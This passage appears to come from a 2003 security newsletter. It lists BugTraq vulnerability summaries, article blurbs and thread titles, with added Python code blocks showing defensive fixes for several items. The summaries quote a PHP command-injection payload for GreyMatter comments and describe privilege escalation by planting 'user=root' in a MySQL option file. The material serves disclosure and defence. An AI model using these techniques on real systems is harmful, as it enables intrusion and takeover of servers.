25. Sun SUNWlldap Library Hostname Buffer Overflow Vulnerability
26. Man Program Unsafe Return Value Command Execution Vulnerability
27. Multitech RouteFinder Remote Memory Corruption Vulnerability
28. SaveMyModem Statusbar_Set_Text Buffer Overflow Vulnerability
29. HP J6038A JetDirect 310x Print Server For Fast Ethernet...
III. SECURITYFOCUS NEWS ARTICLES
1. Hi-Tech Surveillance Firm Prospers
2. Homeland Cybersecurity Efforts Doubted
3. RSA and Verisign beat SSL patent infringement rap
4. For sale: memory stick plus cancer patient records
IV.SECURITYFOCUS TOP 6 TOOLS
1. KisMAC v0.04a
2. psmon v1.0.0
3. eXtended Allow - Deny list for PAM v0.4
4. C-Kermit v8.0.208
5. trafcalc v1.0
6. Ish v1.5.1
V. SECURITYJOBS LIST SUMMARY
1. Looking for Disaster Recovery Analyst for Los Angeles CA (Thread)
2. Any hints for Australia? (Thread)
3. Experienced Security Professional looking for Bay Area...
4. Experienced Security Software consultant, CISSP (Thread)
5. INFOSEC Systems Engineer (Thread)
6. FW: IT Security Evangelist for Italy (Thread)
7. Senior Security Engineer/Analyst (Thread)
8. Senior Engineering Manager-Security (Thread)
9. Systems Engineer-Chicago, Minneapolis, Houston and St. Louis...
10. Information Security Manager, UK (Thread)
11. Security Engineer (Thread)
12. Security Awareness & Training Manager vacancy (Thread)
13. Account Executive (Thread)
14. Looking for a job in England (Thread)
15. Sales Engineer, APac (Thread)
16. Senior Level Security Consultant needed in DC (Thread)
17. RACF Project Sought - 20 Year Veteran Supporting RACF DB2...
18. PFR Thread (Thread)
VI. INCIDENTS LIST SUMMARY
1. CodeRed Observations. (Thread)
2. New article announcement: Open Source Honeypots, Part Two...
3. unidentified DOS "bad traffic" (Thread)
4. Defaced website listing... (Thread)
5. Windows Rootkits/API Hooking (Thread)
6. [unisog] Re: Port 109 Mystery (Thread)
7. FW: CodeRed Observations. (Thread)
8. CANADA.EXE Findings (Thread)
9. tcp/25 (smtp) and tcp/24942 (unk) (Thread)
10. Port 109 Mystery (Thread)
11. [unisog] Port 109 Mystery (Thread)
12. The Return of Code Red II? (Thread)
13. Hosts File "Girlnextdoor_" (Thread)
14. DeLoder technical analysis (Thread)
15. against illegal arp update (Thread)
16. Solved !! "Girlnextdoor_" TCP Ports 1025/1028 (Thread)
17. FW: Alert: New Code Red F worming its way through the 'net...
18. SV: The Return of Code Red II? (Thread)
19. Possibly Unknown Virus? (Thread)
20. CANADA.EXE program (Thread)
21. [Snort-sigs] Snort Signatures for LSD-PL.NET Exploit (Thread)
22. Unknown attack, possible trojan? (Thread)
23. [Full-Disclosure] Bypassing Black Ice PC protection? (Thread)
24. worm/Trojans are taking advantage of default path of Windows...
25. Real-world attacks on sendmail CA-2003-07 seen (Thread)
26. Port 3335 (Thread)
27. W2K Compromise - PipeCmdSrv (Thread)
28. UPDATE: Possibly Unknown Virus? Care to help me analyze?!?...
29. Possibly Unknown Virus? Care to help me analyze?!? (Thread)
30. sendmail exploit or ill formatted spam (Thread)
31. Snort Signatures for LSD-PL.NET Exploit (Thread)
32. Increase in Scans of Port 445? (Thread)
33. New virus outbreak. (Thread)
34. Solved !! "Girlnextdoor_" TCP Ports 1025/1028 (Thread)
35. Bypassing Black Ice PC protection? (Thread)
36. new ddos client? (Thread)
37. New virus outbreak? (Thread)
38. Open mail relay surge (Thread)
VII. VULN-DEV RESEARCH LIST SUMMARY
1. Outlook HTML crash (Thread)
2. su core dumped with signal 3. BSD/OS 3.0, 3.1 (Thread)
3. Win32hlp exploit for : ":LINK overflow" (Thread)
4. Apache 2.x leaked descriptors (Thread)
5. gtali Segmentation fault (Thread)
6. FW: Outlook HTML crash (Thread)
7. Mordred Security Labs now online (Thread)
8. xscreensaver exploit for Redhat 7.3 (Thread)
9. Windows Shellcode - Using Detached_Process flag (Thread)
10. Why SUID Binary exploit does not yield root shell? (Thread)
11. /usr/sbin/sendmail (Thread)
12. Fwd: Kazaa file corruption (Thread)
VIII. MICROSOFT FOCUS LIST SUMMARY
1. SQL Service Pack doesn't upgrade SQL Server (Thread)
2. Exchange/MAPI/RPC (Thread)
3. DisableIPSourceRouting registry key (Thread)
4. SecurityFocus Microsoft Newsletter #128 (Thread)
5. AW: Exchange/MAPI/RPC (Thread)
6. SV: DisableIPSourceRouting registry key (Thread)
7. Worm.Dvldr analysis report (Thread)
8. Article Announcement: Cryptographic Filesystems: Design and...
9. Free SQL chapter available on www.SpecialOpsSecurity.com (Thread)
10. AD replication - IP site to site encryption? (Thread)
11. User rights on Terminal Services (Thread)
IX. SUN FOCUS LIST SUMMARY
1. Solaris disk wipe utilitiy? (Thread)
2. Sun Security Admin Beta Exam.... (Thread)
3. SecurityFocus Article Announcement - Cryptographic Filesystems...
4. Kernel modules (Thread)
5. Administrivia (Thread)
X. LINUX FOCUS LIST SUMMARY
1. Port 113 security (Thread)
2. Traffic Shaping. (Thread)
3. SecurityFocus Article Announcement (Thread)
XI. SPONSOR INFORMATION
I. FRONT AND CENTER
-------------------
1. Open Source Honeypots, Part Two: Deploying Honeyd in the Wild
By Lance Spitzner
This is the second part of a three-part series looking at Honeyd, the
open source honeypot. In this paper we will deploy Honeyd on the
Internet for one week and watch what happens. The intent is to test
Honeyd by letting real bad guys interact with and attack it. We will then
analyze how the honeypot performed and what it discovered.
http://www.securityfocus.com/infocus/1675
2. IP Spoofing: An Introduction
by Matthew Tanase
Criminals have long employed the tactic of masking their true identity,
from disguises to aliases to caller-id blocking. It should come as no
surprise then, that criminals who conduct their nefarious activities on
networks and computers should employ such techniques. IP spoofing is one
of the most common forms of on-line camouflage. In IP spoofing, an
attacker gains unauthorized access to a computer or a network by making
it appear that a malicious message has come from a trusted machine by
"spoofing" the IP address of that machine. In this article, we will
examine the concepts of IP spoofing: why it is possible, how it works,
what it is used for and how to defend against it.
http://www.securityfocus.com/infocus/1674
3. Iraqi Cyberwar: an Ageless Joke
By George Smith
Did U.S. infowar commandos smuggle a deadly computer virus into Iraq
inside a printer? Of course not. So why does it keep getting reported?
http://www.securityfocus.com/columnists/147
4. SecurityFocus DPP Program
Attention Universities!! Sign-up now for preferred pricing on the only
global early-warning system for cyber attacks - SecurityFocus DeepSight
Threat Management System.
Click here for more information:
http://www.securityfocus.com/corporate/products/dpsection.shtml
II. BUGTRAQ SUMMARY
-------------------
1. DBTools DBManager Professional Information Disclosure Weakness
BugTraq ID: 7040
Remote: No
Date Published: Mar 07 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/7040
Summary:
DBManager Professional is database management software for MySQL and
PostgreSQL. It is available for Microsoft Windows operating systems.
Sensitive DBManager Professional configuration information, including
authentication credentials, is stored in plaintext on the system hosting
the software. This information is typically stored in the "catalog.mdb"
file in the "DATA" directory of the program folder.
It has been reported that this information may also be readable by other
local users in the default installation of the software. As a result,
sensitive information which is sufficient to compromise the database may
be exposed to malicious local users.
2. MySQL Control Center Insecure Default File Permission Vulnerability
BugTraq ID: 7041
Remote: No
Date Published: Mar 07 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/7041
Summary:
MySQL Control Center (MySQLCC) is a visual administration interface for
MySQL database servers and is available for multiple platforms.
A vulnerability has been discovered in MySQLCC. The problem lies in the
permissions set on various files used by MySQLCC. Specifically,
configuration and connection files used by the application are set
world-readable. This may allow a malicious local user to obtain access to
sensitive information regarding various MySQL configuration settings.
Access to these files may allow an attacker to obtain information
required to carry out further attacks against a target system.
This issue has been addressed in MySQLCC 0.8.9.
3. NetScreen ScreenOS Loss of Configuration Vulnerability
BugTraq ID: 7042
Remote: Yes
Date Published: Mar 07 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/7042
Summary:
NetScreen is a line of Internet security appliances integrating firewall,
VPN and traffic management features. ScreenOS is the software used to
manage and configure the firewall. NetScreen supports Microsoft Windows
95, 98, ME, NT and 2000 clients.
Under certain circumstances, the device may lose its configuration during
periods of heavy load.
When the configuration is lost, the device will revert to its factory
configuration settings, which rejects all inbound traffic on the
untrusted interface. At the same time, the device will NAT all traffic
on the trusted interface to the untrusted interface. The external
network will not be accessible to the internal network since the device
no longer has a default route defined. This results in a denial of
service to external hosts requiring access to resources behind the device
and internal hosts requiring access to resources on the external network.
In addition, if the default settings are considered insecure, this
condition may result in an exposure.
4. Wordit Logbook Logbook.pl Remote Command Execution Vulnerability
BugTraq ID: 7043
Remote: Yes
Date Published: Mar 07 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/7043
Summary:
Wordit Logbook is a web-based journal implemented in Perl.
Wordit Logbook is prone to a remote command execution vulnerability. This
issue is present in the 'logbook.pl' script.
Logbook does not sufficiently sanitize user-supplied input. Data supplied
via the 'file' URI parameter is passed unchecked to a Perl open() call.
Because Perl's two-argument open() treats a filename that begins or ends
with a pipe character as a command to run, a remote attacker may be able
to execute arbitrary commands in the context of the web server process.
A remote attacker may exploit this condition to gain local, interactive
access to the underlying host.
This vulnerability was reported to affect Wordit Logbook version 098b3;
previous versions may also be affected.
5. Clearswift MailSweeper Malformed MIME Attachment Filter Bypass Vulnerability
BugTraq ID: 7044
Remote: Yes
Date Published: Mar 07 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/7044
Summary:
ClearSwift MailSweeper is an SMTP gateway email filtering product. It
allows filtering based on email content, source, destination and
attachments.
MailSweeper fails to filter certain types of malformed MIME attachments,
allowing potentially malicious attachments through.
RFC 2045 states that if a MIME-Version field is absent, the receiving
mail agent may choose to interpret the body of the message in order to
determine the content since it cannot be assumed that all non-MIME
messages are in US-ASCII plain text.
If an executable attachment does not contain a MIME-Version field,
MailSweeper does not attempt to interpret the content type of the MIME
attachment. MailSweeper then fails to identify the attachment as being
an executable file type and allows it through the filter. This could
result in a malicious executable attachment bypassing the filter and
being executed by the recipient.
Other file types may be allowed through the filter in this way, however,
this has not been confirmed.
The discoverer of this vulnerability states that the vendor has released
an advisory, however, the vendor has not made any public confirmation.
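The filter behaviour described above, as an added example that is not MailSweeper's code: a gateway check that only inspects attachments when a MIME-Version header is present, beside a hardened check that walks every body part regardless, which is what RFC 2045 permits a receiver to do. The two messages, the blocked-extension list and the function names are constructed for this example and are not taken from the advisory.

```python
"""Added example: MIME-Version-dependent attachment filtering and its fix.
The messages below are constructed; the 'MZ' payload is only a PE header stub."""
import email
from email import policy

# Constructed sample: an executable attachment in a well-formed MIME message.
WITH_MIME_VERSION = """\
From: sender@example.test
To: victim@example.test
Subject: report
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain

see attached
--b1
Content-Type: application/octet-stream; name="report.exe"
Content-Disposition: attachment; filename="report.exe"
Content-Transfer-Encoding: base64

TVqQAAMAAAAEAAAA
--b1--
"""

# The same message with the MIME-Version header stripped by the sender.
WITHOUT_MIME_VERSION = WITH_MIME_VERSION.replace("MIME-Version: 1.0\n", "")

# Assumed policy: extensions the gateway refuses to deliver.
BLOCKED_EXTENSIONS = (".exe", ".com", ".scr", ".pif", ".bat")


def _has_blocked_attachment(msg) -> bool:
    """Walk every leaf part; block on file name or on an MZ (PE) header."""
    for part in msg.walk():
        if part.is_multipart():
            continue
        name = (part.get_filename() or "").lower()
        if name.endswith(BLOCKED_EXTENSIONS):
            return True
        payload = part.get_payload(decode=True) or b""
        if payload[:2] == b"MZ":  # content check survives a renamed file
            return True
    return False


def naive_filter(raw: str) -> bool:
    """Returns True if the message is allowed through.
    Mirrors the described fault: without MIME-Version the body is treated
    as plain text and no part is ever inspected."""
    msg = email.message_from_string(raw, policy=policy.default)
    if msg.get("MIME-Version") is None:
        return True
    return not _has_blocked_attachment(msg)


def hardened_filter(raw: str) -> bool:
    """Returns True if the message is allowed through.
    The body is parsed from Content-Type alone; MIME-Version is irrelevant."""
    msg = email.message_from_string(raw, policy=policy.default)
    return not _has_blocked_attachment(msg)
```

Python's email parser, like a mail client, splits the multipart body on the Content-Type boundary whether or not MIME-Version is present, so the hardened filter sees the same attachment in both messages; only the naive filter lets the second one through.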
6. SimpleBBS Users.php Insecure File Permissions Vulnerability
BugTraq ID: 7045
Remote: Yes
Date Published: Mar 07 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/7045
Summary:
SimpleBBS is a freely available, open source PHP Bulletin Board. It is
available for the Unix and Linux operating systems.
SimpleBBS reportedly creates the user database 'users.php' with
world-readable permissions in the SimpleBBS web root. User credentials
are stored in plain text. As a result, anyone who can reach the SimpleBBS
website may view the stored user information contained in the SimpleBBS
user database.
This vulnerability was reported for SimpleBBS 1.0.6. It is not known if
earlier versions are affected by this vulnerability.
7. Microsoft Windows XP Safe Mode Policy Bypass Weakness
BugTraq ID: 7046
Remote: No
Date Published: Mar 07 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/7046
Summary:
Microsoft Windows allows users to start the operating system in "Safe
Mode" to allow troubleshooting of configuration settings and device
driver conflicts.
The Microsoft Knowledgebase states that only members of the local
Administrators group are able to log in to a system that has been started
in Safe Mode.
When the Windows XP "Welcome Screen" is enabled, it is possible for
unprivileged users to log into the system when it is started in Safe
Mode. Normally in Safe Mode with the Welcome Screen enabled, only the
names of administrative accounts are visible. If the user holds down the
left CTRL and ALT keys and presses delete twice, the normal login prompt
will be displayed. At this point, an unprivileged user can log in to the
system in Safe Mode.
8. PostNuke Phoenix Member_List Module SQL Injection Vulnerability
BugTraq ID: 7047
Remote: Yes
Date Published: Mar 07 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/7047
Summary:
A vulnerability has been discovered in PostNuke Phoenix v0.723 and
earlier. Specifically, the Members_List module fails to sufficiently
sanitize user-supplied input, making it prone to SQL injection attacks.
Exploitation may allow for modification of SQL queries, resulting in
information disclosure, or database corruption. The consequences depend
on the nature of specific queries. This issue may allow the attacker to
exploit latent vulnerabilities in the underlying database.
It should be noted that the precise technical details regarding this
vulnerability are currently unknown. This BID will be updated as more
information is made available.
9. PostNuke Phoenix Theme Handling Remote Code Execution Vulnerability
BugTraq ID: 7048
Remote: Yes
Date Published: Mar 07 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/7048
Summary:
A vulnerability has been discovered in PostNuke Phoenix 0.723 and
earlier. The problem occurs in the theme handling engine and may be
triggered through the use of directory traversal sequences.
Although unconfirmed, it may be possible to exploit this issue to execute
arbitrary commands on a target server with the privileges of the
webserver.
The precise technical details regarding this issue are currently unknown.
This BID will be updated as more information is made available.
10. Ethereal SOCKS Dissector Format String Vulnerability
BugTraq ID: 7049
Remote: Yes
Date Published: Mar 08 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/7049
Summary:
Ethereal is a freely available, open source network traffic analysis
tool. It is maintained by the Ethereal Project and is available for most
Unix and Linux variants as well as Microsoft Windows operating systems.
The Ethereal SOCKS dissector is a mechanism for decoding the SOCKS
protocol. A format string vulnerability has been reported in some
versions of this dissector. The vulnerability exists in the
packet-socks.c source file.
An attacker can trigger this vulnerability by sending SOCKS traffic that
contains format string specifiers across a network segment on which
Ethereal is capturing; the SOCKS server itself need not be vulnerable. If
Ethereal is being used as a security tool to monitor network packets, the
dissector will process the malicious data and sensitive memory may be
corrupted.
This has been confirmed to result in a denial of service condition.
Additionally, it may be possible to cause Ethereal to execute malicious
attacker-supplied code.
This vulnerability affects Ethereal 0.9.9 and earlier.
11. Ethereal NTLMSSP Dissector Heap Corruption Vulnerability
BugTraq ID: 7050
Remote: Yes
Date Published: Mar 08 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/7050
Summary:
Ethereal is a freely available, open source network traffic analysis
tool. It is maintained by the Ethereal Project and is available for most
Unix and Linux variants as well as Microsoft Windows operating systems.
The NTLMSSP (NTLM Security Support Provider) dissector is a mechanism for
evaluating packets that use the NTLM protocol. A heap corruption
vulnerability has been reported for some versions of the dissector.
The precise technical details of this vulnerability are currently
unknown. This BID will be updated as further information is available.
An attacker may be able to exploit this vulnerability by crafting a
specially formed packet and sending it to a system using the NTLMSSP
dissector or by convincing a victim user to use Ethereal to read a
malformed packet trace file.
Due to the nature of this vulnerability it may be possible for an
attacker to create a situation in which sensitive memory could be
overwritten. If successful this may allow for the execution of arbitrary
code with the privileges of the Ethereal process.
This vulnerability affects Ethereal 0.9.9 and earlier.
12. Upload Lite Arbitrary File Upload Vulnerability
BugTraq ID: 7051
Remote: Yes
Date Published: Mar 08 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/7051
Summary:
Upload Lite is a Perl CGI script designed to allow remote users to upload
files to a server.
A vulnerability has been reported for Upload Lite that may allow remote
attackers to upload arbitrary files.
Specifically, the script only checks whether the name of the file to be
uploaded contains one of the permitted extensions, not whether it ends in
one. As such, any file whose name includes an allowed extension may be
uploaded. Uploaded files are stored in the configured folder.
Given the ability to upload arbitrary files to the host, an attacker can
exploit this vulnerability to upload malicious applications to the
vulnerable system or use the system for the storage of files.
This vulnerability was reported for Upload Lite 3.22.
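The extension check described above, as an added example in Python rather than Upload Lite's Perl: the substring test beside a strict test on the final extension, plus server-chosen storage names. The allowlist, the sample file names and the function names are assumptions for this example, not the script's own.

```python
"""Added example: weak versus strict upload-name validation (constructed)."""
import posixpath
import secrets

# Assumed allowlist of extensions the upload form is meant to accept.
ALLOWED_EXTENSIONS = (".gif", ".jpg", ".png", ".txt")


def weak_extension_check(filename: str) -> bool:
    """Mirrors the described fault: pass if an allowed extension appears
    anywhere in the name, so 'shell.gif.cgi' is accepted."""
    lowered = filename.lower()
    return any(ext in lowered for ext in ALLOWED_EXTENSIONS)


def strict_extension_check(filename: str) -> bool:
    """Accept only a bare file name whose final extension is allowlisted."""
    if not filename or "\x00" in filename:  # NUL truncation trick in C-backed APIs
        return False
    if "/" in filename or "\\" in filename:  # no path components at all
        return False
    if filename in (".", ".."):
        return False
    stem, ext = posixpath.splitext(filename)
    return bool(stem) and ext.lower() in ALLOWED_EXTENSIONS


def stored_name(filename: str) -> str:
    """Name the file on disk ourselves; only the vetted extension survives,
    so the uploader never controls the stem the web server will see."""
    if not strict_extension_check(filename):
        raise ValueError("rejected upload name: %r" % filename)
    ext = posixpath.splitext(filename)[1].lower()
    return secrets.token_hex(8) + ext
```

The strict check still has to be paired with a storage directory the web server will not execute scripts from; the extension test on its own only closes the substring bug.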
13. MySQL mysqld Privilege Escalation Vulnerability
BugTraq ID: 7052
Remote: Yes
Date Published: Mar 08 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/7052
Summary:
MySQL is an open source relational database project. It is available for
the Microsoft Windows, Linux, and Unix operating systems.
A vulnerability has been discovered for MySQL that may allow the mysqld
service to start with elevated privileges.
MySQL reads a series of option files to configure the service, including
the account it runs as. The files are typically /etc/my.cnf, DATADIR/my.cnf
and ~/.my.cnf. When started, mysqld reads /etc/my.cnf first, then
DATADIR/my.cnf and finally ~/.my.cnf, with each later file overriding
settings from the earlier ones.
An attacker who can write to DATADIR (normally the unprivileged account the
server itself runs as) can exploit this by creating a DATADIR/my.cnf that
includes the line 'user=root' under the '[mysqld]' option section. For the
attack to succeed, the ~/.my.cnf file must not exist.
When the mysqld service is next started, it will run as the root user
instead of the default user.
This allows an attacker who has compromised the unprivileged MySQL account
to obtain root privileges on the system.
This vulnerability was reported for MySQL 3.23.55.
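The option-file read order described above, as an added example that is not MySQL's code: three constructed my.cnf files are merged in mysqld's order, the effective [mysqld] user is reported, and a planted DATADIR/my.cnf is flagged. The file contents, paths and function names are assumptions for this example; it models later-file-wins precedence, which is how MySQL documents option files, and treats an explicit command-line --user as applied last, which is also documented behaviour.

```python
"""Added example: audit the effective 'user' mysqld would start as.
Option-file contents and paths below are constructed for the example."""
import configparser

ETC_MY_CNF = """\
# constructed /etc/my.cnf: distribution default
[mysqld]
user = mysql
datadir = /var/lib/mysql
skip-networking

[mysqld_safe]
log-error = /var/log/mysqld.log
"""

DATADIR_MY_CNF = """\
# constructed DATADIR/my.cnf: planted by whoever can write the data directory
[mysqld]
user = root
"""

# (path, contents) in the order mysqld reads them; None means the file is absent.
OPTION_FILES_AS_READ = [
    ("/etc/my.cnf", ETC_MY_CNF),
    ("/var/lib/mysql/my.cnf", DATADIR_MY_CNF),
    ("/root/.my.cnf", None),
]


def parse_mycnf(text: str) -> configparser.ConfigParser:
    """my.cnf is INI-like; bare keys such as skip-networking have no value."""
    cp = configparser.ConfigParser(allow_no_value=True, strict=False,
                                   interpolation=None, inline_comment_prefixes=("#",))
    cp.read_string(text)
    return cp


def effective_mysqld_user(option_files):
    """Return (user, path that set it); a later file overrides an earlier one."""
    user, source = None, None
    for path, text in option_files:
        if text is None:  # absent file: nothing to override with
            continue
        cp = parse_mycnf(text)
        if cp.has_option("mysqld", "user"):
            user, source = cp.get("mysqld", "user"), path
    return user, source


def audit_mysqld_user(option_files, cmdline_user=None) -> str:
    """Command-line options are applied after all option files, so starting
    the server with an explicit --user=mysql defeats a planted user=root."""
    user, source = effective_mysqld_user(option_files)
    if cmdline_user is not None:
        user, source = cmdline_user, "command line"
    if user == "root":
        return "FAIL: mysqld would start as root (set in %s)" % source
    return "OK: mysqld runs as %s" % user
```

The defensive point the audit makes: the file that wins is the one in the directory the database account can write, so pinning the user on the command line (or keeping DATADIR/my.cnf root-owned and not writable by the mysql account) is what closes the path.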
14. PeopleSoft PeopleTools SchedulerTransfer Remote Command Execution Vulnerability
BugTraq ID: 7053
Remote: Yes
Date Published: Mar 10 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/7053
Summary:
PeopleTools is a runtime architecture and integrated development
environment for PeopleSoft financial management software.
A remote command execution vulnerability exists in the PeopleSoft
PeopleTools "SchedulerTransfer" servlet. This servlet facilitates
migration of reports.
This issue occurs because the servlet does not sufficiently validate
externally supplied data. Exploitation may allow malicious files to be
written to the system hosting the software and executed with the
privileges of the web server.
It is possible to overwrite an existing Java servlet with malicious data by
submitting a request that contains directory traversal sequences, though
this is only one possible attack.
The servlet is installed by default in many PeopleSoft installations and
also permits access by unauthenticated remote users by default.
15. GreyMatter WebLog Remote Command Execution Vulnerability
BugTraq ID: 7055
Remote: Yes
Date Published: Mar 10 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/7055
Summary:
GreyMatter WebLog is an open source weblog software package available for
the Unix and Linux operating systems.
A problem in the software may allow unauthorized access to systems using
the vulnerable software.
It has been reported that a problem in GreyMatter weblog may allow
unauthorized access to systems. Due to improper sanitization of
untrusted input, it may be possible for a remote user to execute commands
on the local system.
The problem is in the handling of user comments by the weblog software.
Due to improper sanitization of the input passed through the weblog
comments fields, an attacker could potentially insert specially crafted
commands such as <?php system(echo($cmd)) ?>. This would in turn result
in the execution of these commands with the privileges of the web server
process.
16. Microsoft Internet Explorer .MHT File Buffer Overflow Vulnerability
BugTraq ID: 7057
Remote: Yes
Date Published: Mar 10 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/7057
Summary:
Microsoft Internet Explorer allows a web page and all content embedded
within to be saved in a Web Archive format using Multipurpose Internet
Mail Extension HTML (MHTML) format. This format saves the entire page
and all the embedded content as a single .mht file.
The .mht files are encoded and decoded by the inetcomm.dll component.
This component does not appear to perform sufficient bounds checking on
the .mht files.
If encoded data within the .mht file is designated as executable or the
Content-Type is not defined and has a single word 'MZP' encoded within, a
buffer will be overrun and Internet Explorer will fail. If the encoded
content begins with 'TvPQ' it will be interpreted by Internet Explorer as
a Win32 executable file, but inetcomm.dll will decode it as plain text
data and assign a small buffer to the data.
Internet Explorer creates a stream for the executable file with a smaller
buffer than is required by the Base64 decoder. This results in the
buffer being overrun and Internet Explorer failing. The EIP register may
also be overwritten, potentially allowing for execution of arbitrary code
within the security context of Internet Explorer.
The Web Archive feature was introduced in Internet Explorer 5, therefore
earlier versions are not affected. Outlook Express must be installed in
order to obtain the Web Archive functionality through Internet Explorer.
Applications that use Internet Explorer to render HTML content, such as
Outlook and Outlook Express, may also be indirectly vulnerable. An HTML
email message containing a malicious .mht file would be processed by the
same Internet Explorer component.
17. DeleGate HTTP Proxy Robot.TXT User-Agent: Buffer Overflow Vulnerability
BugTraq ID: 7054
Remote: Yes
Date Published: Mar 10 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/7054
Summary:
DeleGate is an open source proxy server developed by Yutaka Sato.
DeleGate allows for proxying of several application protocols, including
HTTP. It is available for multiple platforms, including Microsoft
Windows and Unix and Linux variants.
The DeleGate HTTP Proxy component is prone to a remotely exploitable
buffer overflow vulnerability. This is due to insufficient bounds
checking of User-Agent: fields in remote 'robot.txt' files. It is
reported that it is possible to trigger this issue by specifying multiple
lines of User-Agent: data in the file, which will cause an internal array
of pointers to be overflowed with attacker-supplied data. This will
occur when a malicious 'robot.txt' file is retrieved via the proxy.
Successful exploitation may result in execution of malicious code in the
security context of the DeleGate proxy server.
This issue was reported in DeleGate versions 8.3.4 and 8.4.0. Other
versions may also be affected.
18. Opera Long Filename Download Buffer Overrun Vulnerability
BugTraq ID: 7056
Remote: Yes
Date Published: Mar 10 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/7056
Summary:
Opera is a web browser available for a number of platforms, including
Microsoft Windows, Linux and Unix variants and Apple MacOS.
A vulnerability has been discovered in various versions of Opera on the
Microsoft Windows platform.
When specific types of files are downloaded by Opera, the transfer is
displayed within a 'Download Dialog'. Due to insufficient bounds checking
when processing the requested filename, it may be possible for memory to
be corrupted.
Specifically, when a filename is to be displayed within the 'Download
Dialog' the type of file must be verified. When this occurs, the filename
in question is copied into a static buffer on the stack.
By hosting a downloadable file containing a name of excessive length, it
may be possible for an attacker to overwrite sensitive memory locations
within Opera. Successful exploitation of this issue would result in the
execution of arbitrary attacker-supplied commands.
It should be noted that this issue affects Opera versions 6 and 7 on the
Microsoft Windows platform.
19. Qpopper Remote Memory Corruption Vulnerability
BugTraq ID: 7058
Remote: Yes
Date Published: Mar 10 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/7058
Summary:
Qpopper is a POP3 mail server available for Linux and Unix based systems.
A vulnerability has been discovered in the handling of the 'mdef' command.
The issue arises from an incorrect assumption about the Qvsnprintf()
function. The function is meant to be a replacement for the C function
vsnprintf() but, unlike the latter, Qvsnprintf() fails to NUL-terminate
the buffer it fills.
A memory corruption vulnerability exists in Qpopper when processing a
malicious 'mdef' command, as a result of this missing NUL termination.
The vulnerability specifically occurs in the pop_msg() function when
filling the 'message' buffer with a user-supplied macro name. pop_msg()
incorrectly assumes that the 'message' buffer will be NUL-terminated
after being filled via Qvsnprintf(). A CRLF sequence followed by a NUL
byte is later appended to the data, which may overwrite memory at a
location adjacent to the buffer.
By exploiting this to overwrite the least significant byte of a saved
frame pointer, it is possible to influence the program in such a way that
attacker-supplied instructions are executed.
This vulnerability affects Qpopper versions 4.0.4 and earlier. It should
be noted that the exploitability of this issue is highly dependent on the
memory layout, which will likely be influenced by compiler optimization.
20. SMC Router Backup Tool Plaintext Password Weakness
BugTraq ID: 7059
Remote: No
Date Published: Mar 10 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/7059
Summary:
SMC SMC7004VWBR is a wireless Cable/DSL broadband router with integrated
wireless access point and SPI firewall.
It has been reported that the SMC router backup tool stores router
administration credentials in plaintext format. The router administration
password is stored in the file 'backup_config.exe'. Furthermore, the
password is prefixed by the word 'root' making it easily identifiable by
an attacker.
This weakness may allow unauthorised users who obtain the router backup
file to recover the administration password and other sensitive router
configuration information.
This vulnerability has been reported to affect SMC SMC7004VWBR devices,
however other products may also be affected.
21. LXR Cross-Referencer Arbitrary File Disclosure Vulnerability
BugTraq ID: 7062
Remote: Yes
Date Published: Mar 10 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/7062
Summary:
LXR Cross-Referencer is a general purpose source code indexer and
cross-referencer that provides web-based browsing of source code.
It has been reported that LXR Cross-Referencer does not sufficiently
sanitize user-supplied input submitted via URI parameters. Specifically
data supplied via the 'v' variable to the 'source' script is not
sufficiently stripped of directory traversal (../) sequences.
Allegedly, the exploitation of this vulnerability may result in the
disclosure of arbitrary web server readable files.
Successful exploitation may permit the attacker to gain access to
sensitive information that may aid in mounting further attacks against
the system hosting the software.
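The traversal check the 'source' script is missing, as an added example in Python rather than LXR's Perl: the 'v' value is decoded once and lexically resolved beneath the source root, and anything that escapes is refused. The root path, the sample values and the function names are assumptions for this example.

```python
"""Added example: confine a user-supplied path beneath a fixed root."""
import posixpath
from urllib.parse import unquote

SOURCE_ROOT = "/srv/lxr/source"  # assumed location of the indexed tree


def resolve_under_root(root: str, relative: str):
    """Lexically resolve `relative` beneath `root`; None if it escapes.
    A leading '/' is stripped so absolute input cannot replace the root."""
    if "\x00" in relative:
        return None
    root = posixpath.normpath(root)
    candidate = posixpath.normpath(posixpath.join(root, relative.lstrip("/")))
    if candidate == root or candidate.startswith(root + "/"):
        return candidate
    return None


def source_path_for_request(v_param: str):
    """What the script should do with the raw 'v' query value: decode once
    (as the web server does for CGI) and then confine the result."""
    return resolve_under_root(SOURCE_ROOT, unquote(v_param))
```

This is a lexical check only: once the candidate exists on disk, pass it through os.path.realpath and repeat the same prefix test so a symlink inside the tree cannot point outside it.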
22. Multiple PHP-Nuke Forums/Private_Messages SQL Injection Vulnerabilities
BugTraq ID: 7060
Remote: Yes
Date Published: Mar 10 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/7060
Summary:
PHP-Nuke is a web-based portal system. Implemented in PHP, it is
available for a range of systems, including Unix, Linux, and Microsoft
Windows.
Multiple SQL injection vulnerabilities were reported in the Forums
scripts and 'Private_Messages' module of PHP-Nuke. This is due to
insufficient sanitization of externally supplied data which is used to
construct SQL queries. This data may be supplied via URI parameters in
requests for certain functions. A remote attacker may take advantage of
these issues to inject malicious data into SQL queries, possibly
resulting in modification of query logic.
The consequences may vary depending on the particular database
implementation and the nature of the specific queries. At the very
